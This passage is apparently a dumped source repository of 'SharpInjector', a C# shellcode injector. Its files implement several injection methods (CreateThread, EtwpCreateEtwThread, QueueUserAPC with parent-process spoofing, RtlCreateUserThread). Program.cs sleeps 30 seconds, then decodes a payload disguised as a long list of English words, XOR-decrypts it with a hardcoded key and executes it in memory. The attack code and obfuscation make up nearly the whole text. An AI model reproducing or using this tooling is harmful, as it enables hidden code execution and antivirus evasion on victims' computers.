IntPtr hThread = WinAPI.CreateRemoteThreadEx(ProcessInfo.hProcess, IntPtr.Zero, 0, Address, IntPtr.Zero, 0, IntPtr.Zero, IntPtr.Zero);\n if (hThread == IntPtr.Zero)\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n Console.WriteLine(\"[*] Shellcode executed\");\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/CreateThread.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\n\nnamespace SharpInjector\n{\n class CreateThread\n {\n public static void ExecuteCreateThread(byte[] Shellcode)\n {\n IntPtr hThread = IntPtr.Zero;\n UInt32 threadId = 0;\n\n Console.WriteLine(\"[*] Allocating shellcode in current process...\");\n IntPtr Address = WinAPI.VirtualAlloc(IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n if (Address == IntPtr.Zero)\n {\n return;\n }\n\n Marshal.Copy(Shellcode, 0, Address, Shellcode.Length);\n\n if (!WinAPI.VirtualProtect(Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n {\n WinAPI.VirtualFree(Address, 0, WinAPI.FreeType.MEM_RELEASE);\n return;\n }\n\n Console.WriteLine(\"[*] Calling CreateThread...\");\n hThread = WinAPI.CreateThread((IntPtr)0, 0, Address, IntPtr.Zero, 0, ref threadId);\n if (hThread == IntPtr.Zero)\n {\n WinAPI.VirtualFree(Address, 0, WinAPI.FreeType.MEM_RELEASE);\n return;\n }\n\n WinAPI.WaitForSingleObject(hThread, 0xFFFFFFFF);\n Console.WriteLine(\"[*] Shellcode executed\");\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/EtwpCreateEtwThread.cs", "content": "using System;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nusing System.IO;\r\nusing System.Diagnostics;\r\nusing System.Windows.Forms;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Cryptography;\r\n\r\nnamespace SharpInjector\r\n{\r\n class EtwpCreateEtwThread\r\n {\r\n\r\n\r\n public static void ExecuteEtwpCreateEtwThread(byte[] Shellcode)\r\n {\r\n\r\n Console.WriteLine(\"[*] Allocating shellcode in current process...\");\r\n IntPtr Address = WinAPI.VirtualAlloc(IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT | WinAPI.MEM_RESERVE, WinAPI.PAGE_READWRITE);\r\n if (Address == IntPtr.Zero)\r\n {\r\n return;\r\n }\r\n\r\n IntPtr ShellCode_Pointer = Marshal.AllocHGlobal(Shellcode.Length);\r\n Marshal.Copy(Shellcode, 0, ShellCode_Pointer, Shellcode.Length);\r\n WinAPI.RtlCopyMemory(Address, ShellCode_Pointer, Shellcode.Length);\r\n\r\n WinAPI.VirtualProtect(Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect);\r\n\r\n Console.WriteLine(\"[*] Calling EtwpCreateEtwThread...\");\r\n IntPtr location = WinAPI.EtwpCreateEtwThread(Address, IntPtr.Zero);\r\n WinAPI.WaitForSingleObject(location, 0xFFFFFFFF);\r\n Console.WriteLine(\"[*] Shellcode executed\");\r\n\r\n }\r\n\r\n\r\n }\r\n}\r\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/Program.cs", "content": "using System;\r\nusing System.IO;\r\nusing System.Collections.Generic;\r\nusing System.Linq;\r\nusing System.Text;\r\nusing System.Threading.Tasks;\r\nusing System.Diagnostics;\r\nusing System.Windows.Forms;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.Cryptography;\r\nusing System.Net;\r\nusing System.Threading;\r\n\r\n\r\nnamespace SharpInjector\r\n{\r\n class Program\r\n {\r\n private static byte[] xor(byte[] cipher, byte[] key)\r\n {\r\n byte[] decrypted = new byte[cipher.Length];\r\n\r\n for (int i = 0; i < cipher.Length; i++)\r\n {\r\n decrypted[i] = (byte)(cipher[i] ^ key[i % key.Length]);\r\n }\r\n\r\n return decrypted;\r\n }\r\n static void Main(string[] args)\r\n {\r\n Thread.Sleep(1000*30);\r\n Console.WriteLine(\"seleep over\");\r\n string p = \"puffs knives definitions offering principal peg footing thermals berths observer knives catch publication berths drive spots strings knives truths anticipation resolution occurrence cuff berths shed knives odors yaws company occurrence cuff berths polish knives odors harbor centimeter occurrence buzzes spans sets noises prefix change guess occurrence lifetimes resident differences change glances updates reliabilities specialties formation scenes cabinet facilities drive addresses friday emergency hills apples thermals airfield welds sod honor alkalinity formation bypasses conversions change airfield accumulations communications monolith telecommunication commanders occurrence friday friday similarity similarity spare twist anticipation berths observer drydocks sod certifications lamps adherence default hardcopies others experiences scope honor occurrence seeds shortages rate sponges thermocouples prefix friday surges bails others hardcopies expiration grids addresses honor ounce spare eighths drive twist prefix change guess occurrence lifetimes resident differences airfield ornaments cabinet alkalinity mules thermals point subtotal spans entrances entry vent expenditures science scratch entries sod default bypasses harbor swamps armory shortages rate sponges chimney prefix friday surges default scenes rate accumulations airfield hazard honor restrictions noises properties drive deletions knives stalls armory cuff properties expenditures sum airfield reams addresses ohms friday count entries prefix welds knives animals publication count properties feeders offering pools knives yaws auditor bails armory scenes catch centimeter airfield stalls slice merchant gyros wave principal expiration animals lifetimes subordinates settings halves pools speeders defeats share analyses resolution prefixes expenditures scenes strings hazard military boy vent bypasses researcher scenes airfields addresses answers information entries jail stones eighths mirrors facilities airfield change ditto slice lifetimes resident knives programmers grids addresses centimeter mules spots scenes airfields sprayer yaws telephone pen jail stones merchant formation centimeter airfield result defections mules stage alkalinity berths observer drydocks sponges artillery rebounds copy spots prefix reams analyses armory publication drive copy recruits ohms clock point defections auditor military peg armory balances knives military nylon chemicals evaluations result properties desert ditto prefix change guess alkalinity radios thermals alkalinity sponges swamps yaws welds mules vacuum merchant homes cash messenger alarms anticipation occurrence anticipation apprehensions hardcopies stones shipments scope share yaws drydocks eighths desert presence airfield result deletions settings apprehensions resident principal expiration glow alarms conversions evaluations stresses berths thermals airfield book pools accumulations hardcopies chimney wave deletions surges facilities professionals certifications ornaments thermals thermals berths knives glow circumstances berths programs communications expenditures berths observer nozzle spare executions gleam thermals thermals berths halves jeopardy alarms auditor jail specialties eighths speeders thermals catch entries thermocouples boy grids gleam eighths programmers shed stage sleep messenger deductions deletions glow vent count shaft acronyms occurrence sum noises telecommunications harbor prefixes ohms pails friday hazard congress circulation answers apples change state deductions addresses stresses defeats radios knob sprayer balances presence principal prefixes executions jail noises restrictions professionals telecommunications pools grids equivalents deviation deletions cavity feeders emergency occurrence shed meters commanders equivalents equivalents reliabilities speeders thermocouples radios strip knives deductions reams chimney suggestions outfit defect share nose defect addresses pull default truths knob fares pools prefix acronyms technician change sprayer artillery evaluations commanders subtotal knob sprayer telecommunications answers mirrors inspection pull specialties speeders answers change mirrors artillery share artillery thermocouples sponges buzzes settings shortages loans subtotal cash hoofs chock builders professionals fares hoofs ounce resolution answers answers builders chief professionals loans default cash truths chock builders others defect radios ounce shed lifetimes specialties polish ounce similarity lifetimes radios pools sponges analyses speeders sprayer spots chock updates glances defeat change knob welds catch thermals harbor eliminator boy auditor homes gyros gyroscope stones programmers principal adherence fans drive subordinates participation cash stones strings defect entries eliminator nozzle harness photograph drive telecommunications twist centimeter surplus result book subtotal resident slopes professionals spokes navy recruits participation noises share voices thermocouples alkalinity addresses boy glances apprehensions share congress scope entries definitions shortages damages intervals differences sleep gyros balances ditto vent routine builders technician hardcopies slice entries slice meters feeders stalls guess researcher meters tents scope speeders change pull gleam crusts adhesives subordinates hardcopies magazine auxiliaries offering balances circulation chock photograph military resolution scratch labors knives conversions rate resolution sets bails addresses slopes eighths cavity fares updates hardcopies shaft routine company puffs defeat eighths polish inspection technician odors animals slopes subordinates labors participation expiration point communications shaft anticipation artillery outfit congress round hills buzzes voices spans programmers swamps shaft hardcopies speeders congress shipments resident chock crusts footing shortage budget radios jeopardy occurrence puffs defeats sum alarms gyroscope budget clock scenes fares merchant sets halves conversions comment reams wave centimeter surges transmitter thermocouples book ounce eighths presence certifications sets comment airfields navy race communications strings observer ticket seeds properties budget cabinet mules centimeter twist specialties fares surplus settings centimeter settings cabinet mirrors ways meters twist lifetimes voices carpet stage auditor cathode hardcopies shipments suggestions copy offering auditor bails jeopardy participation auditor military properties fasteners nylon apples drydocks entries noises suggestions copy carpet berths adhesives drydocks entries publication vacuum scenes thermals berths observer knives sessions ohms presence berths shaft principal sum airfield footing buzzes spots properties spare nozzle knives military entry chemicals bypasses desert scenes peg observer thermocouples entries subordinates settings anticipation weeks prefix apples chief student stones sessions differences odors hardcopies stones cathode chimney certifications lamps adherence sleep analyses slopes armory sod friday point plating resident technician telecommunication reams suggestions ohms occurrence strings thermals berths observer drydocks scope facilities peg facilities jail principal expiration truths mirrors truths alloy lifetimes ounce subtotal cash hoofs knob artillery fasteners lifetimes thermals animals drydocks ammonia share\";\r\n string s = \"evaluations shed fasteners lifetimes share ounce acronyms analyses speeders pull defeats resolution glances inspection strip telephone telecommunications formation loans technician updates nose scratch entrances crusts answers harbor similarity specialties alloy prefix sod vent conversions sponges airfield chemicals circulation addresses hardcopies seeds sets knives hazard noises publication animals suggestions expenditures thermals homes reams ohms strings catch scope balances yaws welds buzzes centimeter participation defect polish defeat pools prefixes adherence knob routine chimney cash commanders thermocouples builders information mirrors chock fans default programmers messenger monolith change subtotal radios fares truths hoofs sprayer artillery drive berths spots alkalinity observer others professionals outfit accumulations entries armory count reliabilities drydocks subordinates friday mules restrictions scenes copy adhesives company shortages settings occurrence properties eighths slice gyros science chief state spans sleep nozzle executions vacuum recruits stage carpet halves offering round boy auditor glow comment gyroscope presence alarms pails entry voices expiration deductions puffs principal cabinet meters equivalents grids surplus circumstances guess nylon cathode intervals ornaments facilities shipments defections feeders sum twist telecommunication deletions programs auxiliaries plating bypasses cuff spare anticipation ditto experiences communications labors race ways transmitter researcher magazine deviation pen weeks wave differences jail jeopardy hills bails ammonia sessions photograph gleam shaft book merchant peg cavity airfields harness ticket apples result surges stalls eliminator military honor odors stones desert swamps rate certifications spokes clock definitions slopes emergency lamps point resident shortage apprehensions navy budget rebounds congress footing stresses tents damages student\";\r\n char[] raw = { (char)0, (char)1, (char)2, (char)3, (char)4, (char)5, (char)6, (char)7, (char)8, (char)9, (char)10, (char)11, (char)12, (char)14, (char)15, (char)16, (char)17, (char)18, (char)19, (char)20, (char)21, (char)22, (char)23, (char)24, (char)25, (char)26, (char)27, (char)28, (char)29, (char)31, (char)32, (char)33, (char)34, (char)35, (char)36, (char)37, (char)38, (char)39, (char)40, (char)41, (char)42, (char)43, (char)44, (char)45, (char)46, (char)47, (char)48, (char)49, (char)50, (char)51, (char)52, (char)53, (char)54, (char)55, (char)56, (char)57, (char)58, (char)59, (char)60, (char)61, (char)62, (char)63, (char)64, (char)65, (char)67, (char)68, (char)69, (char)70, (char)71, (char)72, (char)73, (char)74, (char)75, (char)77, (char)78, (char)79, (char)80, (char)82, (char)83, (char)84, (char)85, (char)86, (char)87, (char)88, (char)89, (char)90, (char)91, (char)92, (char)93, (char)94, (char)95, (char)96, (char)97, (char)98, (char)99, (char)100, (char)101, (char)102, (char)103, (char)104, (char)105, (char)106, (char)107, (char)108, (char)109, (char)110, (char)111, (char)112, (char)113, (char)114, (char)115, (char)116, (char)118, (char)119, (char)120, (char)121, (char)122, (char)123, (char)124, (char)125, (char)126, (char)127, (char)130, (char)132, (char)133, (char)134, (char)135, (char)136, (char)137, (char)138, (char)139, (char)140, (char)141, (char)142, (char)143, (char)145, (char)146, (char)147, (char)148, (char)149, (char)150, (char)151, (char)152, (char)154, (char)155, (char)156, (char)157, (char)158, (char)160, (char)161, (char)162, (char)164, (char)165, (char)166, (char)167, (char)168, (char)169, (char)170, (char)172, (char)173, (char)174, (char)175, (char)176, (char)177, (char)178, (char)179, (char)180, (char)181, (char)182, (char)183, (char)184, (char)185, (char)186, (char)187, (char)188, (char)189, (char)190, (char)191, (char)192, (char)193, (char)194, (char)195, (char)197, (char)198, (char)201, (char)202, (char)204, (char)205, (char)206, (char)207, (char)208, (char)209, (char)210, (char)211, (char)212, (char)213, (char)214, (char)215, (char)216, (char)217, (char)218, (char)219, (char)220, (char)221, (char)222, (char)224, (char)225, (char)226, (char)227, (char)228, (char)229, (char)230, (char)231, (char)232, (char)233, (char)234, (char)235, (char)236, (char)237, (char)238, (char)239, (char)240, (char)241, (char)242, (char)243, (char)244, (char)245, (char)246, (char)247, (char)248, (char)249, (char)250, (char)251, (char)253, (char)254, (char)255 };\r\n string[] sArray = s.Split(' ');\r\n string[] pArray = p.Split(' ');\r\n\r\n\r\n char[] ret_char = new char[pArray.Length];\r\n\r\n\r\n int index = 0;\r\n for (int i = 0; i < pArray.Length; ++i)\r\n {\r\n for (int j = 0; j < sArray.Length; ++j)\r\n {\r\n if (pArray[i] == sArray[j])\r\n {\r\n ret_char[index] = raw[j];\r\n index++;\r\n }\r\n }\r\n }\r\n byte[] encryptedShellcode = new byte[ret_char.Length];\r\n\r\n for (int k = 0; k < ret_char.Length; k++)\r\n {\r\n\r\n encryptedShellcode[k] = (byte)ret_char[k];\r\n\r\n }\r\n\r\n\r\n\r\n string key = \"admin123\";\r\n byte[] shellcode = null;\r\n shellcode = xor(encryptedShellcode, Encoding.ASCII.GetBytes(key));\r\n\r\n EtwpCreateEtwThread.ExecuteEtwpCreateEtwThread(shellcode);\r\n\r\n return;\r\n\r\n }\r\n\r\n private static UInt32 MEM_COMMIT = 0x1000;\r\n private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;\r\n\r\n // The usual Win32 API trio functions: VirtualAlloc, CreateThread, WaitForSingleObject\r\n [DllImport(\"kernel32\")]\r\n private static extern UInt32 VirtualAlloc(\r\n UInt32 lpStartAddr,\r\n UInt32 size,\r\n UInt32 flAllocationType,\r\n UInt32 flProtect\r\n );\r\n\r\n [DllImport(\"kernel32\")]\r\n private static extern IntPtr CreateThread(\r\n UInt32 lpThreadAttributes,\r\n UInt32 dwStackSize,\r\n UInt32 lpStartAddress,\r\n IntPtr param,\r\n UInt32 dwCreationFlags,\r\n ref UInt32 lpThreadId\r\n );\r\n\r\n [DllImport(\"kernel32\")]\r\n private static extern UInt32 WaitForSingleObject(\r\n IntPtr hHandle,\r\n UInt32 dwMilliseconds\r\n );\r\n\r\n // Decryptor func\r\n public static string Dec(string ciphertext)\r\n {\r\n string key = \"01010101010101010101010101010101\"; // CHANGE THIS 16/24/32 BYTE VALUE TO MATCH ENCRYPTION KEY\r\n\r\n byte[] iv = new byte[16];\r\n byte[] buffer = Convert.FromBase64String(ciphertext);\r\n\r\n using (Aes aes = Aes.Create())\r\n {\r\n aes.Key = Encoding.UTF8.GetBytes(key);\r\n aes.IV = iv;\r\n\r\n ICryptoTransform decryptor = aes.CreateDecryptor(aes.Key, aes.IV);\r\n\r\n using (MemoryStream ms = new MemoryStream(buffer))\r\n {\r\n using (CryptoStream cs = new CryptoStream((Stream)ms, decryptor, CryptoStreamMode.Read))\r\n {\r\n using (StreamReader sr = new StreamReader((Stream)cs))\r\n {\r\n return sr.ReadToEnd();\r\n }\r\n }\r\n }\r\n }\r\n }\r\n\r\n // Execution Types\r\n public enum ExecutionMethod\r\n {\r\n CreateFiber,\r\n CreateRemoteThread,\r\n CreateRemoteThreadEx,\r\n CreateThread,\r\n EtwpCreateEtwThread,\r\n QueueUserAPC,\r\n RtlCreateUserThread\r\n }\r\n\r\n }\r\n\r\n}\r\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/Properties/AssemblyInfo.cs", "content": "using System.Reflection;\nusing System.Runtime.CompilerServices;\nusing System.Runtime.InteropServices;\n\n// General Information about an assembly is controlled through the following\n// set of attributes. Change these attribute values to modify the information\n// associated with an assembly.\n[assembly: AssemblyTitle(\"SharpInjector\")]\n[assembly: AssemblyDescription(\"\")]\n[assembly: AssemblyConfiguration(\"\")]\n[assembly: AssemblyCompany(\"\")]\n[assembly: AssemblyProduct(\"SharpInjector\")]\n[assembly: AssemblyCopyright(\"Copyright © 2020\")]\n[assembly: AssemblyTrademark(\"\")]\n[assembly: AssemblyCulture(\"\")]\n\n// Setting ComVisible to false makes the types in this assembly not visible\n// to COM components. If you need to access a type in this assembly from\n// COM, set the ComVisible attribute to true on that type.\n[assembly: ComVisible(false)]\n\n// The following GUID is for the ID of the typelib if this project is exposed to COM\n[assembly: Guid(\"4744c438-5a65-4ec7-89bd-2a027531b2b0\")]\n\n// Version information for an assembly consists of the following four values:\n//\n// Major Version\n// Minor Version\n// Build Number\n// Revision\n//\n// You can specify all the values or you can default the Build and Revision Numbers\n// by using the '*' as shown below:\n// [assembly: AssemblyVersion(\"1.0.*\")]\n[assembly: AssemblyVersion(\"1.0.0.0\")]\n[assembly: AssemblyFileVersion(\"1.0.0.0\")]\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.Designer.cs", "content": "//------------------------------------------------------------------------------\r\n// \r\n// 此代码由工具生成。\r\n// 运行时版本:4.0.30319.42000\r\n//\r\n// 对此文件的更改可能会导致不正确的行为,并且如果\r\n// 重新生成代码,这些更改将会丢失。\r\n// \r\n//------------------------------------------------------------------------------\r\n\r\nnamespace SharpInjector.Properties {\r\n using System;\r\n \r\n \r\n /// \r\n /// 一个强类型的资源类,用于查找本地化的字符串等。\r\n /// \r\n // 此类是由 StronglyTypedResourceBuilder\r\n // 类通过类似于 ResGen 或 Visual Studio 的工具自动生成的。\r\n // 若要添加或移除成员,请编辑 .ResX 文件,然后重新运行 ResGen\r\n // (以 /str 作为命令选项),或重新生成 VS 项目。\r\n [global::System.CodeDom.Compiler.GeneratedCodeAttribute(\"System.Resources.Tools.StronglyTypedResourceBuilder\", \"17.0.0.0\")]\r\n [global::System.Diagnostics.DebuggerNonUserCodeAttribute()]\r\n [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]\r\n internal class Resource1 {\r\n \r\n private static global::System.Resources.ResourceManager resourceMan;\r\n \r\n private static global::System.Globalization.CultureInfo resourceCulture;\r\n \r\n [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute(\"Microsoft.Performance\", \"CA1811:AvoidUncalledPrivateCode\")]\r\n internal Resource1() {\r\n }\r\n \r\n /// \r\n /// 返回此类使用的缓存的 ResourceManager 实例。\r\n /// \r\n [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]\r\n internal static global::System.Resources.ResourceManager ResourceManager {\r\n get {\r\n if (object.ReferenceEquals(resourceMan, null)) {\r\n global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager(\"SharpInjector.Properties.Resource1\", typeof(Resource1).Assembly);\r\n resourceMan = temp;\r\n }\r\n return resourceMan;\r\n }\r\n }\r\n \r\n /// \r\n /// 重写当前线程的 CurrentUICulture 属性,对\r\n /// 使用此强类型资源类的所有资源查找执行重写。\r\n /// \r\n [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)]\r\n internal static global::System.Globalization.CultureInfo Culture {\r\n get {\r\n return resourceCulture;\r\n }\r\n set {\r\n resourceCulture = value;\r\n }\r\n }\r\n \r\n /// \r\n /// 查找 System.Byte[] 类型的本地化资源。\r\n /// \r\n internal static byte[] 莫文蔚___这世界那么多人 {\r\n get {\r\n object obj = ResourceManager.GetObject(\"莫文蔚___这世界那么多人\", resourceCulture);\r\n return ((byte[])(obj));\r\n }\r\n }\r\n }\r\n}\r\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/Properties/Resource1.resx", "content": "\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n text/microsoft-resx\r\n \r\n \r\n 2.0\r\n \r\n \r\n System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\r\n \r\n \r\n System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\r\n \r\n \r\n \r\n ..\\Resources\\莫文蔚 - 这世界那么多人.mp3;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\r\n \r\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/QueueUserAPC.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Diagnostics;\nusing System.Linq;\nusing System.Runtime.InteropServices;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Windows.Forms;\n\nnamespace SharpInjector\n{\n class QueueUserAPC\n {\n public static void ExecuteQueueUserAPC(string ParentName, string ProgramPath, byte[] Shellcode)\n {\n WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n IntPtr lpSize = IntPtr.Zero;\n\n WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n // Get handle on parent\n Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n ps.nLength = Marshal.SizeOf(ps);\n ts.nLength = Marshal.SizeOf(ts);\n\n IntPtr bytesWritten = IntPtr.Zero;\n\n\n WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n bool success = WinAPI.CreateProcess(\n ProgramPath,\n null,\n ref ps,\n ref ts,\n true,\n WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n IntPtr.Zero,\n null,\n ref StartupInfoEx,\n out ProcessInfo);\n\n if (ProcessInfo.hProcess == IntPtr.Zero)\n {\n return;\n }\n\n Console.WriteLine($\"[*] Spwaned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n Console.WriteLine(\"[*] Allocating shellcode...\");\n IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n if (Address == IntPtr.Zero)\n {\n WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n return;\n }\n\n if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n ProcessThreadCollection CurrentThreads = Process.GetProcessById((int)ProcessInfo.dwProcessId).Threads;\n IntPtr Thread = WinAPI.OpenThread(WinAPI.ThreadAccess.SET_CONTEXT, false, CurrentThreads[0].Id);\n if (Thread == IntPtr.Zero)\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n Console.WriteLine(\"[*] Calling QueueUserAPC...\");\n IntPtr Ptr = WinAPI.QueueUserAPC(Address, Thread, IntPtr.Zero);\n if (Ptr == IntPtr.Zero)\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n uint SuspendCount = WinAPI.ResumeThread(ProcessInfo.hThread);\n if (SuspendCount == 0)\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n Console.WriteLine(\"[*] Shellcode queued for execution\");\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/RtlCreateUserThread.cs", "content": "using System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\nusing System.Threading.Tasks;\nusing System.Runtime.InteropServices;\nusing System.Windows.Forms;\nusing System.Diagnostics;\nusing System.Threading;\n\nnamespace SharpInjector\n{\n class RtlCreateUserThread\n {\n public static void ExecuteRtlCreateUserThread(string ParentName, string ProgramPath, byte[] Shellcode)\n {\n WinAPI.STARTUPINFOEX StartupInfoEx = new WinAPI.STARTUPINFOEX();\n IntPtr lpSize = IntPtr.Zero;\n\n WinAPI.InitializeProcThreadAttributeList(IntPtr.Zero, 1, 0, ref lpSize);\n StartupInfoEx.lpAttributeList = Marshal.AllocHGlobal(lpSize);\n WinAPI.InitializeProcThreadAttributeList(StartupInfoEx.lpAttributeList, 1, 0, ref lpSize);\n\n // Get handle on parent\n Process ParentProcess = Process.GetProcessesByName(ParentName)[0];\n Console.WriteLine($\"[*] Found parent process: {ParentProcess.ProcessName} (pid: {ParentProcess.Id})\");\n IntPtr ParentHandle = WinAPI.OpenProcess(WinAPI.ProcessAccessFlags.PROCESS_CREATE_PROCESS | WinAPI.ProcessAccessFlags.PROCESS_DUP_HANDLE, false, ParentProcess.Id);\n\n IntPtr lpValueProc = Marshal.AllocHGlobal(IntPtr.Size);\n Marshal.WriteIntPtr(lpValueProc, ParentHandle);\n\n WinAPI.UpdateProcThreadAttribute(StartupInfoEx.lpAttributeList, 0, (IntPtr)WinAPI.PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, lpValueProc, (IntPtr)IntPtr.Size, IntPtr.Zero, IntPtr.Zero);\n\n WinAPI.SECURITY_ATTRIBUTES ps = new WinAPI.SECURITY_ATTRIBUTES();\n WinAPI.SECURITY_ATTRIBUTES ts = new WinAPI.SECURITY_ATTRIBUTES();\n\n ps.nLength = Marshal.SizeOf(ps);\n ts.nLength = Marshal.SizeOf(ts);\n\n IntPtr bytesWritten = IntPtr.Zero;\n\n\n WinAPI.PROCESS_INFORMATION ProcessInfo = new WinAPI.PROCESS_INFORMATION();\n\n bool success = WinAPI.CreateProcess(\n ProgramPath,\n null,\n ref ps,\n ref ts,\n true,\n WinAPI.ProcessCreationFlags.CREATE_SUSPENDED | WinAPI.ProcessCreationFlags.CREATE_NO_WINDOW | WinAPI.ProcessCreationFlags.EXTENDED_STARTUPINFO_PRESENT,\n IntPtr.Zero,\n null,\n ref StartupInfoEx,\n out ProcessInfo);\n\n if (ProcessInfo.hProcess == IntPtr.Zero)\n {\n return;\n }\n\n Console.WriteLine($\"[*] Spwaned new instance of {ProgramPath} (pid: {ProcessInfo.dwProcessId})\");\n Process Target = Process.GetProcessById((int)ProcessInfo.dwProcessId);\n\n Console.WriteLine(\"[*] Allocating shellcode...\");\n IntPtr Address = WinAPI.VirtualAllocEx(Target.Handle, IntPtr.Zero, Shellcode.Length, WinAPI.MEM_COMMIT, WinAPI.PAGE_READWRITE);\n if (Address == IntPtr.Zero)\n {\n WinAPI.TerminateProcess(ProcessInfo.hProcess, 0);\n return;\n }\n\n if (!WinAPI.WriteProcessMemory(ProcessInfo.hProcess, Address, Shellcode, Shellcode.Length, out bytesWritten))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n if (!WinAPI.VirtualProtectEx(ProcessInfo.hProcess, Address, Shellcode.Length, WinAPI.PAGE_EXECUTE_READ, out uint OldProtect))\n {\n WinAPI.Clean(ProcessInfo.hProcess, Address, Shellcode.Length);\n return;\n }\n\n IntPtr hThread;\n UInt32 ClientId;\n\n Console.WriteLine(\"[*] Calling RtlCreateUserThread...\");\n WinAPI.RtlCreateUserThread(ProcessInfo.hProcess, 0, false, 0, 0, 0, Address, 0, IntPtr.Zero, out hThread, out ClientId);\n\n WinAPI.CloseHandle(ParentHandle);\n Console.WriteLine(\"[*] Shellcode executed\");\n }\n }\n}\n" }, { "path": "demo3/SharpInjector-master/SharpInjector/SharpInjector.csproj", "content": "\r\n\r\n \r\n \r\n Debug\r\n AnyCPU\r\n {4744C438-5A65-4EC7-89BD-2A027531B2B0}\r\n Exe\r\n SharpInjector\r\n SharpInjector\r\n v4.7.2\r\n 512\r\n true\r\n true\r\n \r\n \r\n AnyCPU\r\n true\r\n full\r\n false\r\n bin\\Debug\\\r\n DEBUG;TRACE\r\n prompt\r\n 4\r\n \r\n \r\n AnyCPU\r\n pdbonly\r\n true\r\n bin\\Release\\\r\n TRACE\r\n prompt\r\n 4\r\n \r\n \r\n true\r\n bin\\x64\\Debug\\\r\n DEBUG;TRACE\r\n full\r\n x64\r\n 